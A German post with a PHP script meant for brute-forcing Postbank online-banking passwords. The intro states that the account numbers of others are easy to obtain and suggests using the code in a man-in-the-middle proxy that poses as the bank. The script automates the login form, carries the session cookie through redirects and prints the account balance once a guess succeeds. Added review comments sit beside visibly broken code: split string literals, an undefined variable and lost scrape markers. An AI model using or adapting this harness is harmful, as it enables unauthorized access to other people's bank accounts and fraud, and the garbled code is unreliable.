Die Postbank-Passwörter fürs Onlinebanking sind ja [A-Z0-9] mit mindestens
5 Stellen Länge, die Kontonummer (eines Gegenübers) bekommt man ja
einfach heraus.
Für den Fall, dass jemand mal per Script sein verlorenes Passwort
wiederherstellen muss, folgt Code in PHP, so dass er leicht in einen Proxy zu
integrieren ist, etwa
um selbst als MAN IN THE MIDDLE als Pestbank aufzutreten! In die
vorletzte Zeile muss das per Brute Force ermittelte Passwort:
postbank("285969607","GEHEIM");
Das Script gibt bei Erfolg den Kontostand aus, ... mal so als Anfang ...
https://banking.postbank.de/rai/login
*/
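/**
 * Reads an HTTP response header block from a stream, up to and including
 * the terminating blank line ("\r\n\r\n").
 *
 * Bytes are read one at a time on purpose: nothing past the terminator is
 * consumed, so the body can be read from the same stream afterwards.
 * The remote peer decides how many bytes precede the terminator, so the read
 * is bounded and stops at end of stream instead of looping forever.
 *
 * @param resource $fres Readable stream positioned at the start of the header.
 * @param int      $nmax Maximum number of header bytes to accept.
 * @return string The bytes read; ends with "\r\n\r\n" only if the terminator
 *                was seen before EOF or the size limit.
 */
function readheader($fres, $nmax = 65536) {
    $shdr = "";
    $nhdr = 0;
    while ($nhdr < $nmax) {
        $sbyt = fread($fres, 1);
        if ($sbyt === false || $sbyt === "") {
            // EOF, timeout or read error: hand back what arrived so far.
            break;
        }
        $shdr .= $sbyt;
        $nhdr += 1;
        if ($nhdr >= 4 && substr($shdr, -4) === "\r\n\r\n") {
            break;
        }
    }
    return $shdr;
}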
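/**
 * Collects the value(s) of one field from a raw HTTP header block.
 *
 * The block is split on "\r\n". A line containing ':' is a field line; a
 * non-empty line without ':' that follows a field line is treated as a
 * continuation of that field. Empty lines (the header terminator) are
 * skipped, so they no longer add empty values to the last field.
 * Every matching value is returned verbatim (including the blank that
 * usually follows the colon); multiple matches are joined with "\r\n".
 *
 * The input comes from the remote peer, so names are compared as strings
 * with strict comparison and no array index is read unless it exists.
 *
 * @param string $shdr Raw header block.
 * @param string $sfld Field name to look for.
 * @param bool   $case true: the name must match exactly; false: letter case
 *                     is ignored.
 * @return string Matching value(s), or "" when the field is absent.
 */
function headervalue($shdr, $sfld, $case = true) {
    $sfld = (string) $sfld;
    $sval = "";
    $sprv = "";
    foreach (explode("\r\n", $shdr) as $slin) {
        if ($slin === "") {
            // Terminating blank line, not a continuation.
            continue;
        }
        $ahdr = explode(":", $slin, 2);
        if (count($ahdr) == 2) {
            $sprv = $ahdr[0];
            $snam = $ahdr[0];
            $stxt = $ahdr[1];
        } elseif ($sprv !== "") {
            // Line without ':' after a field line: continuation of that field.
            $snam = $sprv;
            $stxt = $slin;
        } else {
            // Status line or stray text before the first field.
            continue;
        }
        $bhit = ($snam === $sfld);
        if (!$bhit && !$case) {
            $bhit = (strtolower($snam) === strtolower($sfld));
        }
        if ($bhit) {
            if ($sval !== "") {
                $sval .= "\r\n";
            }
            $sval .= $stxt;
        }
    }
    return $sval;
}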
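/**
 * Decodes an HTTP/1.1 "Transfer-Encoding: chunked" body from a stream.
 *
 * Each chunk is a hexadecimal size line, the chunk data and a CRLF; a size
 * of 0 ends the body and may be followed by trailer lines up to a blank line.
 * All sizes come from the remote peer, so this reader
 *   - stops at end of stream instead of looping forever,
 *   - limits the length of a size line and the total decoded body,
 *   - ignores chunk extensions (";name=value") and rejects non-hex sizes.
 *
 * @param resource $fres Readable stream positioned at the first size line.
 * @param int      $nmax Maximum number of decoded body bytes to accept.
 * @return string The decoded body; partial if the stream ended early, the
 *                input was malformed or the size limit was reached.
 */
function readchunked($fres, $nmax = 8388608) {
    $sbdy = "";
    while (true) {
        // Read one size line, byte by byte, up to and including CRLF.
        $sckh = "";
        while (substr($sckh, -2) !== "\r\n") {
            $sbyt = fread($fres, 1);
            if ($sbyt === false || $sbyt === "" || strlen($sckh) >= 1024) {
                return $sbdy;
            }
            $sckh .= $sbyt;
        }
        $shex = substr($sckh, 0, -2);
        $npos = strpos($shex, ";");
        if ($npos !== false) {
            // Chunk extension: only the part before ';' is the size.
            $shex = substr($shex, 0, $npos);
        }
        $shex = trim($shex);
        if ($shex === "") {
            // Bare CRLF that closes the previous chunk's data.
            continue;
        }
        if (strspn($shex, "0123456789abcdefABCDEF") !== strlen($shex)) {
            return $sbdy;
        }
        $nckb = hexdec($shex);
        if ($nckb == 0) {
            // Last chunk: skip optional trailer lines up to the blank line.
            while (true) {
                $slin = "";
                while (substr($slin, -2) !== "\r\n") {
                    $sbyt = fread($fres, 1);
                    if ($sbyt === false || $sbyt === "" || strlen($slin) >= 1024) {
                        return $sbdy;
                    }
                    $slin .= $sbyt;
                }
                if ($slin === "\r\n") {
                    return $sbdy;
                }
            }
        }
        if ($nckb > $nmax - strlen($sbdy)) {
            // Declared size would exceed the accepted total.
            return $sbdy;
        }
        $nrem = (int) $nckb;
        while ($nrem > 0) {
            $sckb = fread($fres, $nrem);
            if ($sckb === false || $sckb === "") {
                return $sbdy;
            }
            $sbdy .= $sckb;
            $nrem -= strlen($sckb);
        }
    }
}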
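//ob_start();
// Limit the script's execution time to 10 seconds.
// NOTE(review): per the PHP manual, time spent waiting in stream operations is
// not counted toward this limit on non-Windows systems, so this is not a
// network timeout.
set_time_limit(10);
// Commented-out debug dump of $_SERVER, kept on one line so that no part of
// it is parsed as code.
//foreach($_SERVER as $key_name => $key_value) { echo "" . $key_name . " = " . $key_value . "\n\n"; }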
/**
 * Logs in to the banking host over one keep-alive TLS socket and echoes a
 * value scraped from the last page it fetches.
 *
 * Flow as written: one login form POST, then four follow-up requests on the
 * same socket. After each of the first four responses the status code is
 * parsed and, on 302, the next request path is taken from the Location
 * header. The fifth response is read as a chunked body and searched for the
 * text between two markers, which is printed after the prefix "EURO ".
 *
 * Nothing is returned; the only output is via echo. A failed connect is not
 * reported and the socket is not closed explicitly.
 *
 * NOTE(review): in this listing several string literals and one commented-out
 * line are split across lines, presumably by line wrapping or markup stripping
 * of the page; the code below is reproduced as shown.
 *
 * @param string $snum Value sent as form field "nutzername".
 * @param string $spin Value sent as form field "kennwort".
 */
function postbank($snum, $spin) {
// Debug switch: any value other than 0 echoes each request and response.
$NDBG=0;
$sres = "";
$nerr = 0;
$serr = "";
// The host name is fixed; every request below goes to this one name.
$ssrv="banking.postbank.de";
$sreq = "";
$sres = "";
// TLS socket to port 443. No stream context is passed, so certificate
// verification follows PHP's defaults for ssl:// streams.
// NOTE(review): confirm the default for the PHP version in use.
if ($fres = fsockopen ("ssl://" . $ssrv, 443, $nerr, $serr)) {
$sreq="";
$shdr="";
$sbdy="";
// Request 1: the login form POST. Path and field names are hard-coded.
$surl="/rai/login?-1.IFormSubmitListener-login-loginForm";
$spst = "";
$spst .= "id3_hf_0=&";
$spst .= "jsDisabled=false&";
// NOTE(review): $spin and $snum are concatenated without urlencode(); a '&',
// '=' or '%' in either value would change the form body.
$spst .= "kennwort=" . $spin;
$spst .= "&loginButton=Anmelden";
$spst .= "&nutzername=" . $snum ;
// The request head is built by hand. Only Host, Content-Type, Content-length
// and Connection are sent; there is no User-Agent or Accept header.
$sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
HTTP/1.1\r\n";
$sreq .= "Host: " . $ssrv . "\r\n";
if ($spst != "") {
$sreq .= "Content-Type: application/x-www-form-urlencoded\r\n";
$sreq .= "Content-length: " . strlen($spst) . "\r\n";
}
$sreq .= "Connection: keep-alive\r\n";
$sreq .= "\r\n";
// NOTE(review): Content-length above is strlen($spst), but two further "\r\n"
// are appended after the body here and are not covered by that length.
if ($spst != "") {
$sreq .= $spst . "\r\n";
$sreq .= "\r\n";
}
// Debug dump, HTML-escaped; skipped while $NDBG is 0.
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($sreq) . "
";
}
fwrite ($fres,$sreq);
// Response 1: header block first, then a body only if Content-Length is set.
$shdr = readheader($fres);
$slen = headervalue($shdr, "Content-Length", false);
$slen = trim($slen);
if ($slen != "") {
if ($slen != 0) {
// NOTE(review): the length is stored in $nlen, but the loop tests $mlen, which
// is never assigned in this function; as written $sbdy stays empty.
$nlen = intval($slen);
while (strlen($sbdy) < $mlen) {
$sbdy .= fread($fres, 1);
}
}
}
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($shdr) . "
";
echo "" .htmlentities($sbdy) . "
";
echo "
";
}
// Session cookie handling: of all Set-Cookie values only those starting with
// "JSESSIONID=" are kept, cut at "; Path=/", and turned into "Cookie:" request
// lines for the following requests.
$sCOK = "";
$scok = headervalue($shdr, "Set-Cookie", false);
$acok = explode("\r\n",$scok);
$nCOK = count($acok);
$ncok = 0;
// NOTE(review): "<=" lets $ncok reach count($acok), one past the last element.
while ($ncok <= $nCOK) {
$acok[$ncok] = trim($acok[$ncok]);
if (strlen($acok[$ncok]) >= 11) {
if (substr($acok[$ncok],0,11) == "JSESSIONID=") {
$npos = strpos($acok[$ncok], "; Path=/");
if ($npos !== false) {
$acok[$ncok] = substr($acok[$ncok],0,$npos);
}
$sCOK .= "Cookie: " . $acok[$ncok] . "\r\n";
}
}
// echo $ncok . ". " . $acok[$ncok] . "\r\n
";
$ncok++;
}
$scok = $sCOK;
//echo $scok;
// Take the three-digit status code from a status line starting with "HTTP/1.1".
$scod="";
$ahdr = explode("\r\n",$shdr);
$nHDR = count($ahdr);
if ($nHDR >= 1) {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1")) {
if (substr($ahdr[0],0,strlen("HTTP/1.1")) == "HTTP/1.1") {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1 ###")) {
$scod = substr($ahdr[0], strlen("HTTP/1.1 "), 3);
}
}
}
}
// On 302 the path of the next request is taken from Location. Only the
// "https://" prefix is checked; the host part is cut off by its expected
// length and is not compared with $ssrv.
if ($scod == "302") {
$sRDR = "";
$srdr = headervalue($shdr, "Location", false);
$srdr = trim($srdr);
if (strlen($srdr) >= strlen("https://")) {
if (substr($srdr,0,strlen("https://")) == "https://") {
if (strlen($srdr) >= strlen("https://" . $ssrv)) {
$surl = substr($srdr, strlen("https://" . $ssrv),
(strlen($srdr) - strlen("https://" . $ssrv)));
}
}
}
}
// Request 2, same socket, with the session cookie line(s) attached. $spst still
// holds the login form at this point, so the method string is "POST", but no
// body and no Content-length are sent.
$sreq="";
$shdr="";
$sbdy="";
$sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
HTTP/1.1\r\n";
$sreq .= "Host: " . $ssrv . "\r\n";
if ($scok != "") {
$sreq .= $scok;
}
$sreq .= "Connection: keep-alive\r\n";
$sreq .= "\r\n";
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($sreq) . "
";
}
fwrite ($fres,$sreq);
// Response 2: same header/Content-Length handling as for response 1,
// including the $nlen/$mlen mismatch.
$shdr = readheader($fres);
$slen = headervalue($shdr, "Content-Length", false);
$slen = trim($slen);
if ($slen != "") {
if ($slen != 0) {
$nlen = intval($slen);
while (strlen($sbdy) < $mlen) {
$sbdy .= fread($fres, 1);
}
}
}
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($shdr) . "
";
echo "" .htmlentities($sbdy) . "
";
echo "
";
}
// Status code and 302 handling, identical to the block after response 1.
$scod="";
$ahdr = explode("\r\n",$shdr);
$nHDR = count($ahdr);
if ($nHDR >= 1) {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1")) {
if (substr($ahdr[0],0,strlen("HTTP/1.1")) == "HTTP/1.1") {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1 ###")) {
$scod = substr($ahdr[0], strlen("HTTP/1.1 "), 3);
}
}
}
}
if ($scod == "302") {
$sRDR = "";
$srdr = headervalue($shdr, "Location", false);
$srdr = trim($srdr);
if (strlen($srdr) >= strlen("https://")) {
if (substr($srdr,0,strlen("https://")) == "https://") {
if (strlen($srdr) >= strlen("https://" . $ssrv)) {
$surl = substr($srdr, strlen("https://" . $ssrv),
(strlen($srdr) - strlen("https://" . $ssrv)));
}
}
}
}
//echo $surl;
// Request 3: $spst is cleared here, so this and the later requests are GETs.
$spst="";
$sreq="";
$shdr="";
$sbdy="";
$sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
HTTP/1.1\r\n";
$sreq .= "Host: " . $ssrv . "\r\n";
if ($scok != "") {
$sreq .= $scok;
}
$sreq .= "Connection: keep-alive\r\n";
$sreq .= "\r\n";
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($sreq) . "
";
}
fwrite ($fres,$sreq);
// Response 3: same handling as for responses 1 and 2.
$shdr = readheader($fres);
$slen = headervalue($shdr, "Content-Length", false);
$slen = trim($slen);
if ($slen != "") {
if ($slen != 0) {
$nlen = intval($slen);
while (strlen($sbdy) < $mlen) {
$sbdy .= fread($fres, 1);
}
}
}
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($shdr) . "
";
echo "" .htmlentities($sbdy) . "
";
echo "
";
}
$scod="";
$ahdr = explode("\r\n",$shdr);
$nHDR = count($ahdr);
if ($nHDR >= 1) {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1")) {
if (substr($ahdr[0],0,strlen("HTTP/1.1")) == "HTTP/1.1") {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1 ###")) {
$scod = substr($ahdr[0], strlen("HTTP/1.1 "), 3);
}
}
}
}
if ($scod == "302") {
$sRDR = "";
$srdr = headervalue($shdr, "Location", false);
$srdr = trim($srdr);
if (strlen($srdr) >= strlen("https://")) {
if (substr($srdr,0,strlen("https://")) == "https://") {
if (strlen($srdr) >= strlen("https://" . $ssrv)) {
$surl = substr($srdr, strlen("https://" . $ssrv),
(strlen($srdr) - strlen("https://" . $ssrv)));
}
}
}
}
//echo $surl;
// Request 4: GET with the session cookie, built like request 3.
$spst="";
$sreq="";
$shdr="";
$sbdy="";
$sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
HTTP/1.1\r\n";
$sreq .= "Host: " . $ssrv . "\r\n";
if ($scok != "") {
$sreq .= $scok;
}
$sreq .= "Connection: keep-alive\r\n";
$sreq .= "\r\n";
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($sreq) . "
";
}
fwrite ($fres,$sreq);
// Response 4: same handling as for the earlier responses.
$shdr = readheader($fres);
$slen = headervalue($shdr, "Content-Length", false);
$slen = trim($slen);
if ($slen != "") {
if ($slen != 0) {
$nlen = intval($slen);
while (strlen($sbdy) < $mlen) {
$sbdy .= fread($fres, 1);
}
}
}
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($shdr) . "
";
echo "" .htmlentities($sbdy) . "
";
echo "
";
}
$scod="";
$ahdr = explode("\r\n",$shdr);
$nHDR = count($ahdr);
if ($nHDR >= 1) {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1")) {
if (substr($ahdr[0],0,strlen("HTTP/1.1")) == "HTTP/1.1") {
if (strlen($ahdr[0]) >= strlen("HTTP/1.1 ###")) {
$scod = substr($ahdr[0], strlen("HTTP/1.1 "), 3);
}
}
}
}
if ($scod == "302") {
$sRDR = "";
$srdr = headervalue($shdr, "Location", false);
$srdr = trim($srdr);
if (strlen($srdr) >= strlen("https://")) {
if (substr($srdr,0,strlen("https://")) == "https://") {
if (strlen($srdr) >= strlen("https://" . $ssrv)) {
$surl = substr($srdr, strlen("https://" . $ssrv),
(strlen($srdr) - strlen("https://" . $ssrv)));
}
}
}
}
//echo $surl;
// Request 5: the last GET; its response is the page that gets scraped.
$spst="";
$sreq="";
$shdr="";
$sbdy="";
$sreq .= (($spst == "") ? "GET" : "POST") . " " . $surl . "
HTTP/1.1\r\n";
$sreq .= "Host: " . $ssrv . "\r\n";
if ($scok != "") {
$sreq .= $scok;
}
$sreq .= "Connection: keep-alive\r\n";
$sreq .= "\r\n";
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($sreq) . "
";
}
fwrite ($fres,$sreq);
// Final response: the body is read only when Transfer-Encoding is exactly
// "chunked"; with any other value $sbdy stays empty.
$shdr = readheader($fres);
$senc = headervalue($shdr, "Transfer-Encoding", false);
$senc = trim($senc);
if ($senc == "chunked") {
$nbdy = -1;
$sbdy = readchunked($fres);
$nbdy = strlen($sbdy);
}
if ($NDBG != 0) {
echo "
";
echo "" .htmlentities($shdr) . "
";
echo "" .htmlentities($sbdy) . "
";
echo "
";
}
// Scrape step: print the text found between the markers $sopn and $scls.
// NOTE(review): in this listing $sopn is an empty string and $scls is a bare
// line break; presumably the original HTML markers were lost when the page
// was rendered. Confirm against the original script.
$sopn="";
$nopn = strpos($sbdy, $sopn);
if ($nopn !== false) {
$nopn += strlen($sopn);
$scls = "
";
$ncls = strpos($sbdy, $scls, $nopn);
if ($ncls !== false) {
$seur=substr($sbdy, $nopn , ($ncls - $nopn));
// Unlike the debug dumps above, this remote page content is echoed without
// htmlentities().
echo "EURO " . $seur ;
}
}
// NOTE(review): there is no fclose($fres) and no else branch; when fsockopen()
// fails, $nerr and $serr are left unused and nothing is printed.
}
}
// Script entry: one live login attempt with the values below, then exit.
// Both values are hard-coded literals, so whatever is entered here is stored
// in clear text in the script file itself.
$snum = "0123456789";
$spin = "BRUTEFORCE";
postbank($snum, $spin);
exit(0);
?>